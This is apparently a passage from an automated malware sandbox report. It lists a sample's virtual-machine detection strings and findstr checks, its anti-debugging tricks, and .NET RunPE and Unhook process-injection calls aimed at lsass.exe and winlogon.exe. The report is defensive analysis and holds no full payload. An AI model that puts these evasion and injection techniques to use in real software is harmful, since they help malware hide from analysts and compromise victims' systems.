Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.49.dr Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.49.dr Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: svchost.exe, 00000028.00000002.2993257907.000002A66062A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: System.evtx.49.dr Binary or memory string: VMCI: Using capabilities (0x1c).
Source: Amcache.hve.10.dr Binary or memory string: vmci.sys
Source: powershell.exe, 00000007.00000002.2143782680.000001A69FE59000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: qemu-ga
Source: cmd.exe, 00000012.00000003.2144168789.0000022123586000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A000B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmware
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.dr Binary or memory string: nonicNECVMWarVMware SATA CD00
Source: svchost.exe, 00000031.00000000.2542454624.000001D55862B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3023041096.000001D55862B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.49.dr Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: $Hyper-V Time Synchronization Service
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: $Hyper-V Volume Shadow Copy Requestor
Source: Amcache.hve.10.dr Binary or memory string: VMware20,1
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: Amcache.hve.10.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.10.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.10.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.10.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.10.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.10.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: svchost.exe, 00000031.00000000.2544794675.000001D5592C3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: dowvmci
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.49.dr Binary or memory string: VMware
Source: Amcache.hve.10.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.10.dr Binary or memory string: VMware Virtual RAM
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.49.dr Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
Source: Amcache.hve.10.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A01D7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxguest.sys
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmmouse.sys
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: -Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Source: powershell.exe, 00000007.00000002.2143782680.000001A69FE59000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: qemuwmi2b
Source: Amcache.hve.10.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: cmd.exe, 00000012.00000003.2151836316.0000022123586000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: Amcache.hve.10.dr Binary or memory string: VMware Virtual USB Mouse
Source: lsass.exe, 00000027.00000002.3021017119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicvssNT SERVICE
Source: Amcache.hve.10.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.10.dr Binary or memory string: VMware, Inc.
Source: powershell.exe, 00000007.00000002.2143782680.000001A69FE3A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: QEMU HARDDISK
Source: Amcache.hve.10.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.10.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.10.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A01D7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxmouse.sys
Source: Amcache.hve.10.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: C:\Program Files\VMware
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.49.dr Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VBoxMouse.sys
Source: dwm.exe, 00000029.00000002.3092877606.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
Source: Microsoft-Windows-Partition%4Diagnostic.evtx.49.dr Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.dr Binary or memory string: storahciNECVMWarVMware SATA CD00
Source: Amcache.hve.10.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.10.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: lsass.exe, 00000027.00000002.3013591403.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2475100061.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000000.2481960070.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2991631959.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.2995071226.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000000.2506773435.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000002.2994903908.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.2510442351.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.2523222262.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.3015839207.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2542454624.000001D55862B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: lsass.exe, 00000027.00000002.3021017119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicshutdownNT SERVICE
Source: Amcache.hve.10.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.10.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.10.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.10.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: lsass.exe, 00000027.00000000.2476179547.00000202C0379000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTVMWare
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.dr Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000031.00000002.3024245117.000001D558643000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: (@vmcitpA
Source: svchost.exe, 00000028.00000002.3000439300.000002A660662000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000038.00000000.2589284251.0000023FD3802000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: Amcache.hve.10.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A01D7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: c:\program files\vmware
Source: lsass.exe, 00000027.00000002.3021017119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicheartbeatNT SERVICE
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VBoxSF.sys
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VBoxGuest.sys
Source: powershell.exe, 00000007.00000002.2143782680.000001A6A00E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: !Hyper-V PowerShell Direct Service
Source: dwm.exe, 00000029.00000002.3092877606.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Windows\System32\dllhost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\dllhost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\wbem\WMIC.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Checks if the current process is being debugged
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugFlags Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugFlags
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugObjectHandle
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\cmd.exe Code function: 18_2_0000022123C2CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_0000022123C2CD80
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\cmd.exe Code function: 18_2_0000022123C21E3C LoadLibraryA,GetProcAddress,Sleep, 18_2_0000022123C21E3C
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\System32\cmd.exe Code function: 18_2_0000022123C235C8 GetProcessHeap,HeapAlloc,StrCmpNIW,GetProcessHeap,HeapFree, 18_2_0000022123C235C8
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe Process token adjusted: Debug
Source: C:\Windows\System32\cmd.exe Code function: 18_2_0000022123C2CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_0000022123C2CD80
Source: C:\Windows\System32\cmd.exe Code function: 18_2_0000022123C284B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_0000022123C284B0
Source: C:\Windows\System32\cmd.exe Code function: 18_2_0000022123C28814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 18_2_0000022123C28814
Source: C:\Windows\System32\cmd.exe Code function: 18_2_0000022123C5CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_0000022123C5CD80
Source: C:\Windows\System32\cmd.exe Code function: 18_2_0000022123C584B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_0000022123C584B0
Source: C:\Windows\System32\cmd.exe Code function: 18_2_0000022123C58814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 18_2_0000022123C58814
Source: C:\Windows\System32\conhost.exe Code function: 19_2_0000013F08E6CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_0000013F08E6CD80
Source: C:\Windows\System32\conhost.exe Code function: 19_2_0000013F08E68814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 19_2_0000013F08E68814
Source: C:\Windows\System32\conhost.exe Code function: 19_2_0000013F08E684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_0000013F08E684B0
Source: C:\Windows\System32\conhost.exe Code function: 19_2_0000013F08E9CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_0000013F08E9CD80
Source: C:\Windows\System32\conhost.exe Code function: 19_2_0000013F08E98814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 19_2_0000013F08E98814
Source: C:\Windows\System32\conhost.exe Code function: 19_2_0000013F08E984B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_0000013F08E984B0
Source: C:\Windows\System32\conhost.exe Code function: 36_2_000001FD186D8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 36_2_000001FD186D8814
Source: C:\Windows\System32\conhost.exe Code function: 36_2_000001FD186D84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 36_2_000001FD186D84B0
Source: C:\Windows\System32\conhost.exe Code function: 36_2_000001FD186DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 36_2_000001FD186DCD80
Source: C:\Windows\System32\dllhost.exe Code function: 37_2_0000017C6DABCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 37_2_0000017C6DABCD80
Source: C:\Windows\System32\dllhost.exe Code function: 37_2_0000017C6DAB84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 37_2_0000017C6DAB84B0
Source: C:\Windows\System32\dllhost.exe Code function: 37_2_0000017C6DAB8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 37_2_0000017C6DAB8814
Source: C:\Windows\System32\dllhost.exe Code function: 37_2_0000017C6DD7CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 37_2_0000017C6DD7CD80
Source: C:\Windows\System32\dllhost.exe Code function: 37_2_0000017C6DD784B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 37_2_0000017C6DD784B0
Source: C:\Windows\System32\dllhost.exe Code function: 37_2_0000017C6DD78814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 37_2_0000017C6DD78814
Source: C:\Windows\System32\winlogon.exe Code function: 38_2_00000225DC648814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 38_2_00000225DC648814
Source: C:\Windows\System32\winlogon.exe Code function: 38_2_00000225DC6484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 38_2_00000225DC6484B0
Source: C:\Windows\System32\winlogon.exe Code function: 38_2_00000225DC64CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 38_2_00000225DC64CD80
Source: C:\Windows\System32\winlogon.exe Code function: 38_2_00000225DC678814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 38_2_00000225DC678814
Source: C:\Windows\System32\winlogon.exe Code function: 38_2_00000225DC6784B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 38_2_00000225DC6784B0
Source: C:\Windows\System32\winlogon.exe Code function: 38_2_00000225DC67CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 38_2_00000225DC67CD80
Source: C:\Windows\System32\lsass.exe Code function: 39_2_00000202C0AE84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 39_2_00000202C0AE84B0
Source: C:\Windows\System32\lsass.exe Code function: 39_2_00000202C0AE8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 39_2_00000202C0AE8814
Source: C:\Windows\System32\lsass.exe Code function: 39_2_00000202C0AECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 39_2_00000202C0AECD80
Source: C:\Windows\System32\lsass.exe Code function: 39_2_00000202C0B184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 39_2_00000202C0B184B0
Source: C:\Windows\System32\lsass.exe Code function: 39_2_00000202C0B18814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 39_2_00000202C0B18814
Source: C:\Windows\System32\lsass.exe Code function: 39_2_00000202C0B1CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 39_2_00000202C0B1CD80
Source: C:\Windows\System32\svchost.exe Code function: 40_2_000002A66130CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 40_2_000002A66130CD80
Source: C:\Windows\System32\svchost.exe Code function: 40_2_000002A661308814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 40_2_000002A661308814
Source: C:\Windows\System32\svchost.exe Code function: 40_2_000002A6613084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 40_2_000002A6613084B0
Source: C:\Windows\System32\dwm.exe Code function: 41_2_000002BAAEDCCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_000002BAAEDCCD80
Source: C:\Windows\System32\dwm.exe Code function: 41_2_000002BAAEDC8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 41_2_000002BAAEDC8814
Source: C:\Windows\System32\dwm.exe Code function: 41_2_000002BAAEDC84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_000002BAAEDC84B0
Source: C:\Windows\System32\dwm.exe Code function: 41_2_000002BAAEDFCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_000002BAAEDFCD80
Source: C:\Windows\System32\dwm.exe Code function: 41_2_000002BAAEDF8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 41_2_000002BAAEDF8814
Source: C:\Windows\System32\dwm.exe Code function: 41_2_000002BAAEDF84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_000002BAAEDF84B0
Source: C:\Windows\System32\wbem\WMIADAP.exe Code function: 42_2_0000027053068814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 42_2_0000027053068814
Source: C:\Windows\System32\wbem\WMIADAP.exe Code function: 42_2_000002705306CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_000002705306CD80
Source: C:\Windows\System32\wbem\WMIADAP.exe Code function: 42_2_00000270530684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_00000270530684B0

HIPS / PFW / Operating System Protection Evasion
barindex
.NET source code contains process injector
Source: 34.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs .Net Code: Run contains injection code
Source: 35.2.powershell.exe.2a7faed0000.16.raw.unpack, RunPE.cs .Net Code: Run contains injection code
Source: 35.2.powershell.exe.2a7f2866f10.15.raw.unpack, RunPE.cs .Net Code: Run contains injection code
.NET source code references suspicious native API functions
Source: 34.2.powershell.exe.4040b0.1.raw.unpack, Unhook.cs Reference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 34.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 34.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
Source: 34.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
Source: 34.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtSetContextThread(thread, intPtr5)
Contains functionality to inject code into remote processes
Source: C:\Windows\System32\dllhost.exe Code function: 37_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess, 37_2_0000000140002434
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 870000
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\winlogon.exe EIP: DC612EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\lsass.exe EIP: C0AB2EBC
